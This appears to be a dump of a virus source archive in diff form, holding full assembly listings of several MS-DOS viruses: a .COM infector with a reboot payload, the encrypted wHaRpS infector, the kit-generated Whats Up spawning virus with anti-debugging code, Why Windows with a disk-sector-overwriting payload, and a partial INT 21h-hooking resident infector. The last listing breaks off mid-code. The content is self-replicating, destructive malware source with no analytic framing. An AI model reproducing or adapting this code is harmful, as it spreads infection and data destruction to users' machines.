CMP WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too long?
JA find_next ;If too long, find another one
CMP WORD PTR [SI+dta_len],0AH ;Is it too short?
JB find_next ;Then go find another one
MOV DI,[SI+nam_ptr] ;DI points to file name
PUSH SI ;Save SI
ADD SI,dta_nam ;Point SI to file name
;********************************************************************
; Move the name to the end of the path
;********************************************************************
more_chars:
LODSB
STOSB
CMP AL,0
JNZ more_chars ;Move characters until we find a 00
;********************************************************************
; Get File Attributes
;********************************************************************
POP SI
MOV AX,OFFSET 4300H
MOV DX,wrk_spc ;Point to \path\name in workspace
; NOP ;MASM will add this NOP here
ADD DX,SI
INT 21H
MOV [SI+old_att],CX ;Save the old attributes
;********************************************************************
; Rewrite the attributes to allow writing to the file
;********************************************************************
MOV AX,OFFSET 4301H ;Set attributes
AND CX,OFFSET 0FFFEH ;Set all except "read only" (weird)
MOV DX,wrk_spc ;Offset of \path\name in workspace
; NOP ;MASM will add this NOP here
ADD DX,SI ;Point to \path\name
INT 21H
;********************************************************************
; Open Read/Write channel to the file
;********************************************************************
MOV AX,OFFSET 3D02H ;Read/Write
MOV DX,wrk_spc ;Offset to \path\name in workspace
; NOP ;MASM will add this NOP here
ADD DX,SI ;Point to \path\name
INT 21H
JNB opened_ok ;If file was opened OK
JMP fix_attr ;If it failed, restore the attributes
;*******************************************************************
; Get the file date & time
;*******************************************************************
opened_ok:
MOV BX,AX
MOV AX,OFFSET 5700H
INT 21H
MOV [SI+old_tim],CX ;Save file time
MOV [SI+ol_date],DX ;Save the date
;*******************************************************************
; Get current system time
;*******************************************************************
MOV AH,2CH
INT 21H
AND DH,7 ;Last 3 bits 0? (once in eight)
JNZ seven_in_eight
;*******************************************************************
; The special "one in eight" infection. If the above line were in
; its original form, this code would be run 1/8 of the time, and
; rather than appending a copy of this virus to the .COM file, the
; file would get 5 bytes of code that reboot the system when the
; .COM file is run.
;*******************************************************************
MOV AH,40H ;Write to file
MOV CX,5 ;Five bytes
MOV DX,SI
ADD DX,reboot ;Offset of reboot code in data area
INT 21H
JMP SHORT fix_time_stamp
NOP
;******************************************************************
; Here's where we infect a .COM file with this virus
;******************************************************************
seven_in_eight:
MOV AH,3FH
MOV CX,3
MOV DX,first_3
; NOP ;MASM will add this NOP here
ADD DX,SI
INT 21H ;Save first 3 bytes into the data area
JB fix_time_stamp ;Quit, if read failed
CMP AX,3 ;Were we able to read all 3 bytes?
JNZ fix_time_stamp ;Quit, if not
;******************************************************************
; Move file pointer to end of file
;******************************************************************
MOV AX,OFFSET 4202H
MOV CX,0
MOV DX,0
INT 21H
JB fix_time_stamp ;Quit, if it didn't work
MOV CX,AX ;DX:AX (long int) = file size
SUB AX,3 ;Subtract 3 (OK, since DX must be 0, here)
MOV [SI+jmp_dsp],AX ;Save the displacement in a JMP instruction
ADD CX,OFFSET c_len_y
MOV DI,SI ;Point DI to virus data area
SUB DI,OFFSET c_len_x
;Point DI to reference vir_dat, at start of pgm
MOV [DI],CX ;Modify vir_dat reference:2nd, 3rd bytes of pgm
;*******************************************************************
; Write virus code to file
;*******************************************************************
MOV AH,40H
MOV_CX virlen ;Length of virus, in bytes
MOV DX,SI
SUB DX,OFFSET codelen ;Length of virus code, gives starting
; address of virus code in memory
INT 21H
JB fix_time_stamp ;Jump if error
CMP AX,OFFSET virlen ;All bytes written?
JNZ fix_time_stamp ;Jump if error
;**********************************************************************
; Move file pointer to beginning of the file
;**********************************************************************
MOV AX,OFFSET 4200H
MOV CX,0
MOV DX,0
INT 21H
JB fix_time_stamp ;Jump if error
;**********************************************************************
; Write the 3 byte JMP at the start of the file
;**********************************************************************
MOV AH,40H
MOV CX,3
MOV DX,SI ;Virus data area
ADD DX,jmp_op ;Point to the reconstructed JMP
INT 21H
;**********************************************************************
; Restore old file date & time, with seconds modified to 62
;**********************************************************************
fix_time_stamp:
MOV DX,[SI+ol_date] ;Old file date
MOV CX,[SI+old_tim] ;Old file time
AND CX,OFFSET 0FFE0H
OR CX,1FH ;Seconds = 31/30 min = 62 seconds
MOV AX,OFFSET 5701H
INT 21H
;**********************************************************************
; Close File
;**********************************************************************
MOV AH,3EH
INT 21H
;**********************************************************************
; Restore Old File Attributes
;**********************************************************************
fix_attr:
MOV AX,OFFSET 4301H
MOV CX,[SI+old_att] ;Old Attributes
MOV DX,wrk_spc
; NOP ;MASM will add this NOP
ADD DX,SI ;DX points to \path\name in workspace
INT 21H
JMP all_done
; Offset setting procedure
; ~~~~~~~~~~~~~~~~~~~~~~~~
memtrick:
PUSH CX
MOV DX,OFFSET vir_dat ;This is where the virus data starts.
; The 2nd and 3rd bytes get modified.
CLD ;Pointers will be auto INcremented
MOV SI,DX ;Access data as offset from SI
ADD SI,first_3 ;Point to original 1st 3 bytes of .COM
MOV DI,OFFSET 100H ;`cause all .COM files start at 100H
MOV CX,3
REPZ MOVSB ;Restore original first 3 bytes of .COM
MOV SI,DX ;Keep SI pointing to the data area
PUSH ES
MOV AH,2FH
INT 21H
;*************************************************************
; Save the DTA address
;*************************************************************
MOV [SI+old_dta],BX
MOV [SI+old_dts],ES ;Save the DTA address
POP ES
;*************************************************************
; Set DTA to point inside the virus data area
;*************************************************************
MOV DX,dta ;Offset of new DTA in virus data area
; NOP ;MASM will add this NOP here
ADD DX,SI ;Compute DTA address
MOV AH,1AH
INT 21H ;Set new DTA to inside our own code
PUSH ES
PUSH SI
MOV ES,DS:2CH
MOV DI,0 ;ES:DI points to environment
RET
;************************************************************************
;The virus data starts here. It's accessed off the SI register, per the
; comments as shown
;************************************************************************
vir_dat EQU $
;Use this with (SI + old_dta)
olddta_ DW 0 ;Old DTA offset
;Use this with (SI + old_dts)
olddts_ DW 0 ;Old DTA segment
;Use this with (SI + old_tim)
oldtim_ DW 0 ;Old Time
;Use this with (SI + ol_date)
oldate_ DW 0 ;Old date
;Use this with (SI + old_att)
oldatt_ DW 0 ;Old file attributes
;Here's where the first three bytes of the original .COM file go.(SI + first_3)
first3_ EQU $
INT 20H
NOP
;Here's where the new JMP instruction is worked out
;Use this with (SI + jmp_op)
jmpop_ DB 0E9H ;Start of JMP instruction
;Use this with (SI + jmp_dsp)
jmpdsp_ DW 0 ;The displacement part
;This is the type of file we're looking to infect. (SI + f_spec)
fspec_ DB '*.COM',0
;Use this with (SI + path_ad)
pathad_ DW 0 ;Path address
;Use this with (SI + nam_ptr)
namptr_ DW 0 ;Pointer to start of file name
;Use this with (SI + env_str)
envstr_ DB 'PATH=' ;Find this in the environment
;File name workspace (SI + wrk_spc)
wrkspc_ DB 40h dup (0)
;Use this with (SI + dta)
dta_ DB 16h dup (0) ;Temporary DTA goes here
;Use this with (SI + dta_tim)
dtatim_ DW 0,0 ;Time stamp in DTA
;Use this with (SI + dta_len)
dtalen_ DW 0,0 ;File length in the DTA
;Use this with (SI + dta_nam)
dtanam_ DB 0Dh dup (0) ;File name in the DTA
;Use this with (SI + reboot)
reboot_ DB 0EAH,0F0H,0FFH,0FFH,0FFH ;Five byte FAR JMP to FFFF:FFF0
lst_byt EQU $ ;All lines that assemble into code are
; above this one
;*****************************************************************************
;The virus needs to know a few details about its own size and the size of its
; code portion. Let the assembler figure out these sizes automatically.
;*****************************************************************************
virlen = lst_byt - v_start ;Length, in bytes, of the entire virus
codelen = vir_dat - v_start ;Length of virus code, only
c_len_x = vir_dat - v_start - 2 ;Displacement for self-modifying code
c_len_y = vir_dat - v_start + 100H ;Code length + 100h, for PSP
;*****************************************************************************
;Because this code is being appended to the end of an executable file, the
; exact address of its variables cannot be known. All are accessed as offsets
; from SI, which is represented as vir_dat in the below declarations.
;*****************************************************************************
old_dta = olddta_ - vir_dat ;Displacement to the old DTA offset
old_dts = olddts_ - vir_dat ;Displacement to the old DTA segment
old_tim = oldtim_ - vir_dat ;Displacement to old file time stamp
ol_date = oldate_ - vir_dat ;Displacement to old file date stamp
old_att = oldatt_ - vir_dat ;Displacement to old attributes
first_3 = first3_ - vir_dat ;Displacement-1st 3 bytes of old .COM
jmp_op = jmpop_ - vir_dat ;Displacement to the JMP opcode
jmp_dsp = jmpdsp_ - vir_dat ;Displacement to the 2nd 2 bytes of JMP
f_spec = fspec_ - vir_dat ;Displacement to the "*.COM" string
path_ad = pathad_ - vir_dat ;Displacement to the path address
nam_ptr = namptr_ - vir_dat ;Displacement to the filename pointer
env_str = envstr_ - vir_dat ;Displacement to the "PATH=" string
wrk_spc = wrkspc_ - vir_dat ;Displacement to the filename workspace
dta = dta_ - vir_dat ;Displacement to the temporary DTA
dta_tim = dtatim_ - vir_dat ;Displacement to the time in the DTA
dta_len = dtalen_ - vir_dat ;Displacement to the length in the DTA
dta_nam = dtanam_ - vir_dat ;Displacement to the name in the DTA
reboot = reboot_ - vir_dat ;Displacement to the 5 byte reboot code
CODE ENDS
END VCODE

5198
MSDOS/Virus.MSDOS.Unknown.whale.asm Normal file
View File

File diff suppressed because it is too large Load Diff

336
MSDOS/Virus.MSDOS.Unknown.wharps.asm Normal file
View File

@ -0,0 +1,336 @@
; "One must crawl before one walks."
; wHaRpS Virus 1.0
; wHaRpS virus of independent virus writer FirstStrike
; For use by [Phalcon\Skism] ONLY!
; Special thanx to:
; Gheap
; Dark Angel
; Demogorgon
name wHaRpS
title
code segment
assume cs:code,ds:code
org 100h
dta equ 65000d ; DTA address to be set
fname equ 65000d + 1eh ; DTA - file name
ftime equ 65000d + 16h ; DTA - file time
fsize equ 65000d + 1ah ; DTA - file size
orgdir equ 65400d ; original path storage
date equ 65300d ; store file date
time equ 65302d ; store file time
attrib equ 65304d ; store file attrib
err1 equ 65306d ; old error handler address
err2 equ 65308d ; old error handler address
olddta equ 80h ; original DTA address
begin:
nop
nop
nop
call setup ; find "delta offset"
setup:
pop bp
sub bp, offset setup
jmp main ; DEBUG E8 02 00
nop
jmp main
crypt_em:
xor di,di
lea si, [bp+main]
mov di, si
mov cx, end_crypt - main
xor_loop:
lodsb ; ds:[si] -> al
db 34h ; xor al, XX
encrypt_val db 0 ; Starting encryption value is 0
stosb ; al ->es:[di]
loop xor_loop
ret
main:
xor di,di
mov di,0100h ; Restore first three
lea si,[bp+saveins] ; original program bytes
mov cx,0003d
rep movsb
jmp system_pic ; Take a "picture" of system settings
handler: ; error handler
mov al,0
iret
endp
data label byte
wharps db '[wHaRpS]',0 ; wHaRpS ID
author db 'FŒrsØStrŒkä',0 ; Me
dir_mask db '*.',0 ; dir atrib
allcom db '*.COM',0 ; what to search for
root db '\',0 ; root
saveins db 0e8h,00h,00h ; original three bytes
ultimate dw 0 ; ultimate dir to be reached
current dw 0 ; current dir
message db 'wHaRpS! It is 3:00 a.m. > ETERNAL $'
system_pic: ; SNAP!
mov ah,47h ; get original path
mov dl,0
lea si,cs:orgdir ; store original path
int 21h
crypt_change: ; set crypt value
mov ah,2ch
int 21h
mov [bp+encrypt_val],dl
cmp ch,03
jz more
jmp errorh
more:
cmp cl,00
jz bomb
jmp errorh
bomb:
mov ah,09h
lea dx,[bp+message]
int 21h
mov ah,4ch
int 21h
errorh:
push es ; save original error handler address
mov ax,3524h
int 21h
mov word ptr cs:err1,bx
mov word ptr cs:err2,es
pop es
mov ax,2524h ; set an error handler
lea dx, [bp+offset handler] ; no more Retry,Abort,Fail deals
int 21h
jmp pre_search
drop_to_root: ; subroutine to visit the root
lea dx,[bp+root]
jmp continue
set_path: ; OR set a path
lea dx,cs:fname
continue:
mov ah,3bh
int 21h
ret
return_to_search:
inc [bp+ultimate]
call drop_to_root
mov [bp+current],0000
jmp find_first_dir
pre_search: ; set a DTA
mov dx,dta
mov ah,1ah
int 21h
mov [bp+current],0000 ; zero the counters
mov [bp+ultimate],0000 ; ""
inc [bp+ultimate] ; want to search 1st dir in root
call drop_to_root ; bomb to root
find_first_dir: ; directory searchin'
lea dx,[bp+dir_mask]
mov cx,16
mov ah,4Eh
int 21h
jc almost_done ; no directories?
dir_test:
inc [bp+current] ; directory found - MARK!
mov bx,[bp+current]
cmp word ptr [bp+ultimate],bx ; is it the one we want?
jnz find_next_dir ; no, find another
call set_path ; yes, set the correct path
jmp find_first_file ; find some .COMs
find_next_dir: ; mo' directory searchin'
mov ah,4fh
int 21h
jc almost_done
jmp dir_test ; go see if correct dir found yet
find_first_file: ; file searchin'
lea dx,[bp+allcom]
mov cx,00000001b
mov ah,4Eh
int 21h
jc return_to_search ; no .COM so mo' dir
jmp check_if_ill ; is the file "sick"?
find_next_file: ; keep on a searchin'
mov ah,4fh
int 21h
jc return_to_search ; no more .COM so back
; to the directories
check_if_ill: ; check file's health
mov ax,cs:ftime
and al,11111b ; good, your sick!
cmp al,62d/2 ; (No more 62 seconds as virus
jz find_next_file ; markers! - I swear!)
cmp cs:fsize,60000d ; whoa, file to big!
ja find_next_file ; so, get a new one
cmp cs:fsize,500d ; whoa, file to small!
jb find_next_file ; throw it back and move on
jmp infect ; perfect, for infection
db 'Joy J.',0 ; don't ask
error:
pre_done:
almost_done:
jmp done ; in case of emergency.....
infect:
mov ah,43h ; save original attribute
mov al,00h
lea dx,cs:[fname]
int 21h
mov cs:attrib,cx
jc pre_done
mov ax,4301h ; clear all attributes
and cx,11111110b ; (none shall slow progress)
int 21h
jc pre_done
mov ax,3d02h ; open the file, please
int 21h
jc pre_done
xchg bx,ax
mov ax,5700h ; save the date/time
int 21h
mov cs:time,cx
mov cs:date,dx
jc pre_done
mov ah,3Fh ; read first 3 bytes of file
mov cx,0003h ; to be infected and save
lea dx,[bp+saveins]
int 21h
jc pre_done
mov ax,4202h ; move to end of file
xor cx,cx
xor dx,dx
int 21h
jc pre_done
mov [bp+new_jmp],ax
call crypt_em
end_crypt label byte ; encrypt to here
mov ah,40h
mov cx,endcode-begin
lea dx,[bp+begin]
int 21h ; encrypt n' write virus to end of
jc done ; file
mov ax,4200h ; go to beginning of file
xor cx,cx
xor dx,dx
int 21h
jc done
jmp cont
jmpc db 0e9h
new_jmp dw ?
cont:
mov ah,40h
mov cl,3
lea dx,[bp+jmpc]
int 21h
jc done
attrib_stuff:
mov ax,5701h
mov cx,cs:[time]
mov dx,cs:[date]
or cl,11111b
int 21h
jc done
mov ah,3eh
int 21h
jc done
mov ax,4301h
mov cx,cs:[attrib]
lea dx,cs:[fname]
int 21h
jc done
done:
mov dx,olddta ; restore all changes
mov ah,1ah
int 21h
push ds
mov ax,2524h
lea dx,cs:[err2]
mov ds,dx
lea dx,cs:[err1]
int 21h
pop ds
mov ah,3bh
mov dx,'/'
int 21h
mov ah,3bh
lea dx,cs:[orgdir]
int 21h
xor di,di
mov di,0100h
jmp di ; good_bye
endcode label byte
code ends
end begin

300
MSDOS/Virus.MSDOS.Unknown.whatsup.asm Normal file
View File

@ -0,0 +1,300 @@
; WHATSUP.ASM -- Whats Up Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Unknown User
virus_type equ 2 ; Spawning Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
start label near
main proc near
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
stop_tracing: mov cx,09EBh
mov ax,0FE05h ; Acutal move, plus a HaLT
jmp $-2
add ah,03Bh ; AH now equals 025h
jmp $-10 ; Execute the HaLT
mov bx,offset null_vector ; BX points to new routine
push cs ; Transfer CS into ES
pop es ; using a PUSH/POP
int 021h
mov al,1 ; Disable interrupt 1, too
int 021h
jmp short skip_null ; Hop over the loop
null_vector: jmp $ ; An infinite loop
skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged
lock_keys: mov al,128 ; Change here screws DEBUG
out 021h,al ; If tracing then lock keyboard
mov ah,04Ah ; DOS resize memory function
mov bx,(finish - start) / 16 + 0272h ; BX holds # of para.
int 021h
mov sp,(finish - start) + 01100h ; Change top of stack
mov si,offset spawn_name ; SI points to true filename
int 02Eh ; DOS execution back-door
push ax ; Save return value for later
mov ax,cs ; AX holds code segment
mov ds,ax ; Restore data segment
mov es,ax ; Restore extra segment
mov cx,0063h ; Do 99 infections
search_loop: push cx ; Save CX
call search_files ; Find and infect a file
pop cx ; Restore CX
loop search_loop ; Repeat until CX is 0
pop ax ; AL holds return value
mov ah,04Ch ; DOS terminate function
int 021h
main endp
db 06Fh,050h,0CAh,0F9h,065h
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
mov dx,offset root ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
mov dx,offset all_files ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
mov dx,offset up_dir ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
mov dx,offset exe_mask ; DX points to "*.EXE"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
exe_mask db "*.EXE",0 ; Mask for all .EXE files
traverse endp
db 0B1h,043h,04Ah,043h,07Bh
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
db 011h,019h,099h,0B6h,0BDh
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov di,bx ; DI points to the DTA
lea si,[di + 01Eh] ; SI points to file name
mov dx,si ; DX points to file name, too
mov di,offset spawn_name + 1; DI points to new name
xor ah,ah ; AH holds character count
transfer_loop: lodsb ; Load a character
or al,al ; Is it a NULL?
je transfer_end ; If so then leave the loop
inc ah ; Add one to the character count
stosb ; Save the byte in the buffer
jmp short transfer_loop ; Repeat the loop
transfer_end: mov byte ptr [spawn_name],ah; First byte holds char. count
mov byte ptr [di],13 ; Make CR the final character
mov di,dx ; DI points to file name
xor ch,ch ;
mov cl,ah ; CX holds length of filename
mov al,'.' ; AL holds char. to search for
repne scasb ; Search for a dot in the name
mov word ptr [di],'OC' ; Store "CO" as first two bytes
mov byte ptr [di + 2],'M' ; Store "M" to make "COM"
mov byte ptr [set_carry],0 ; Assume we'll fail
mov ax,03D00h ; DOS open file function, r/o
int 021h
jnc infection_done ; File already exists, so leave
mov byte ptr [set_carry],1 ; Success -- the file is OK
mov ah,03Ch ; DOS create file function
mov cx,00100111b ; CX holds file attributes (all)
int 021h
xchg bx,ax ; BX holds file handle
call encrypt_code ; Write an encrypted copy
mov ah,03Eh ; DOS close file function
int 021h
infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed
ret ; Return to caller
spawn_name db 12,12 dup (?),13 ; Name for next spawn
set_carry db ? ; Set-carry-on-exit flag
infect_file endp
vcl_marker db "[VCL]",0 ; VCL creation marker
note db "Whats Up Virus"
db "By White Shark"
db "Mess with the White Shark and"
db "you'll be eaten alive!"
encrypt_code proc near
mov si,offset encrypt_decrypt; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 8],dx ; Low word of timer is new key
xor byte ptr [si],1 ;
xor byte ptr [si + 7],1 ; Change all SIs to DIs
xor word ptr [si + 10],0101h; (and vice-versa)
mov di,offset finish ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
mov si,offset write_stuff ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
mov dx,offset start ; DX points to virus
call finish ; Encrypt/write/decrypt
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
encrypt_decrypt proc near
mov si,offset start_of_code ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main

221
MSDOS/Virus.MSDOS.Unknown.why-wind.asm Normal file
View File

@ -0,0 +1,221 @@
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
ww proc far
start:
jmp loc_2
db 12 dup (90h)
db 0CDh, 20h
loc_2:
jmp short loc_3
db 90h, 2Ah, 2Eh, 63h, 6Fh, 6Dh
db 00h, 00h
data_8 db 'C:\Command.Com', 0
db 'C:\Autoexec.Bat', 0
db 'C:\Config.Sys', 0
db '\win'
data_12 dw 6F64h
db 'ws\win.com'
db 00h,0E9h, 0Eh, 00h, 90h,0C8h
db 01h
loc_3:
mov bx,101h
mov ah,[bx]
mov bx,102h
mov al,[bx]
xchg al,ah
add ax,3
mov si,ax
mov ah,1Ah
lea dx,[si+2C8h]
add dx,6
int 21h
mov ah,4Eh
lea dx,[si+103h]
mov cx,6
int 21h
cmp ax,12h
je loc_7
lea dx,[si+10Ah]
jmp short loc_6
db 90h
loc_5:
mov ah,4Dh
int 21h
mov ah,4Fh
int 21h
cmp ax,12h
je loc_7
lea dx,[si+2C8h]
add dx,24h
loc_6:
mov ah,3Dh
mov al,2
int 21h
mov bx,ax
mov ah,42h
mov al,2
mov dx,0
mov cx,0
int 21h
push ax
sub ax,6
mov dx,ax
mov ah,42h
mov al,0
mov cx,0
int 21h
mov ah,3Fh
mov cx,1
lea dx,[si+14Bh]
int 21h
mov ah,byte ptr data_8+30h[si]
cmp ah,42h
jne loc_8
jmp short loc_5
loc_7:
jmp short loc_9
db 90h
loc_8:
mov ah,42h
mov al,0
mov dx,0
mov cx,0
int 21h
mov ax,3F00h
mov cx,3
lea dx,[si+2C8h]
add dx,3
int 21h
mov ax,4200h
mov dx,0
mov cx,0
int 21h
pop ax
sub ax,3
mov byte ptr data_8+2Eh[si],al
mov byte ptr data_8+2Fh[si],ah
mov ah,40h
mov cx,3
lea dx,[si+148h]
int 21h
mov ax,4202h
mov dx,0
mov cx,0
int 21h
mov ah,40h
lea dx,[si+100h]
mov cx,data_12[si]
int 21h
mov ax,4000h
lea dx,[si+2C8h]
add dx,3
mov cx,3
int 21h
jmp short loc_9
db 90h
loc_9:
mov ah,3Eh
int 21h
mov ah,41h
lea dx,[si+137h]
int 21h
mov ah,2Ah
int 21h
cmp dh,2
jne loc_14
cmp dl,17h
je loc_10
cmp dl,18h
je loc_11
cmp dl,19h
je loc_12
jmp short loc_14
db 90h
loc_10:
mov ah,3Ch
lea dx,[si+119h]
mov cx,1
int 21h
jmp short loc_14
db 90h
loc_11:
mov ah,3Ch
lea dx,[si+129h]
mov cx,1
int 21h
jmp short loc_14
db 90h
loc_12:
mov al,2
loc_13:
mov cx,96h
mov dx,0
int 26h
inc al
cmp al,4
jne loc_13
loc_14:
mov cx,3
lea ax,[si+2C8h]
mov si,ax
mov di,100h
rep movsb
call sub_1
int 20h
ww endp
sub_1 proc near
mov di,offset start
jmp di
db 'Why Windows '
copyright db '(c)1992 MaZ / BetaBoys B.B'
db 90h, 90h, 90h
sub_1 endp
seg_a ends
end start

289
MSDOS/Virus.MSDOS.Unknown.windooze.asm Normal file
View File

@ -0,0 +1,289 @@
ideal
@date = 0355h ;21.10.1981
@time = 8E79h ;17:51:50
model tiny
codeseg
startupcode
jmp begin
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
macro intdos
pushf
call [dword cs:oi21]
endm
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
i21: push ax
xor al,al
cmp ah,3ch
jz okk
cmp ah,5bh
jz okk
cmp ah,3dh
jz okk
inc al
cmp ah,16h
jz okk
cmp ah,0fh
jnz ov0
okk: jmp ok
ov0: cmp ah,1ah
jz setdta
mov [byte cs:funct],12h
cmp ah,12h
jz fndf
cmp ah,11h
jz fndf
mov [byte cs:funct],4fh
cmp ah,4eh
jz fndh
cmp ah,4fh
jz fndh
ov: pop ax
db 0eah
oi21 dw 0
oi21s dw 0
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
setdta: mov [cs:dta],dx
mov [cs:dta+2],ds
jmp ov
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
fndh: pop ax
fnd0: intdos
jc fex
pushf
push si di es ds
lds si,[dword cs:dta]
compar: cmp [word si+16h],@time
jnz f10
cmp [word si+18h],@date
jnz f10
pop ds es di si
popf
lds dx,[dword cs:dta]
db 0b4h
funct db 4fh
jmp fnd0
f10: pop ds es di si
popf
fex: push ax bp
mov bp,sp
lahf
mov [ss:bp+8],ah
pop bp ax
iret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
fndf: pop ax
fnf0: intdos
and al,al
jnz fex
pushf
push si di es ds
lds si,[dword cs:dta]
cmp [byte ds:si],0ffh
jnz f21
add si,7
f21: inc si
jmp compar
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ok: push bx cx dx si di ds es
and al,al
jz nex
mov cx,6
mov ax,cs
mov es,ax
lea di,[ok1]
mov si,dx
rep cmpsw
jnz nex
pop es ds di si dx cx bx ax
mov ax,1313h
iret
nex:
xor ax,ax
mov ds,ax
mov ax,[ds:90h]
push ax
mov ax,[ds:92h]
push ax
mov [word ds:90h],offset i24
mov [word ds:92h],cs
mov bx,[ds:46ch]
mov ax,cs
mov ds,ax
mov es,ax
test bx,6C1h
jnz no_chg
cmp [byte pauss],0
jz chg1
dec [byte pauss]
jmp no_chg
chg1: mov [pauss],80
xor al,al
out 43h,al
jcxz $+2
in al,40h
mov bl,al
in al,40h
add al,bl
and al,1fh
cmp al,'Z'-'A'
jbe xx1
sub al,'Z'-'A'
xx1: add al,'A'
std
mov si,offset fname+6
lea di,[si+1]
mov cx,7
rep movsb
stosb
no_chg:
mov ah,5bh
lea dx,[fname]
mov cx,1
intdos
jc term
mov bx,ax
mov ah,40h
mov cx,offset endcod-100h
mov dx,100h
; inc [cs:count]
mov [cs:flag],0
intdos
cmp ax,offset endcod-100h
jnz ok1
mov [cs:flag],1
ok1: mov ax,5701h
mov cx,@time
mov dx,@date
intdos
mov ah,3eh
intdos
cmp [cs:flag],1
jz term
lea dx,[fname]
mov ax,4301h
xor cx,cx
intdos
lea dx,[fname]
mov ah,41h
; dec [cs:count]
intdos
term: xor ax,ax
mov ds,ax
pop ax
mov [ds:92h],ax
pop ax
mov [ds:90h],ax
ok0: pop es ds di si dx cx bx
jmp ov
driv db 0
flag db 0
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
i24: mov al,3
iret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
begin: mov ah,16h
lea dx,[ok1]
int 21h
cmp ax,1313h
jnz b01
b02: int 20h
b01: mov ax,[ds:2ch]
mov ds,ax
xor si,si
cld
b04: lodsb
and al,al
jnz b04
lodsb
and al,al
jnz b04
inc si
inc si
b05: mov bx,si
b06: lodsb
cmp al,':'
jz b05
cmp al,'\'
jz b05
and al,al
jnz b06
mov cx,si
sub cx,bx
mov si,bx
mov di,offset fname
rep movsb
mov ah,2fh
int 21h
mov [cs:dta],bx
mov [cs:dta+2],es
mov [byte cs:pauss],0
mov ax,cs
mov ds,ax
dec ax
mov es,ax
mov cl,4
mov ax,offset endpr-100h
add ax,15
shr ax,cl
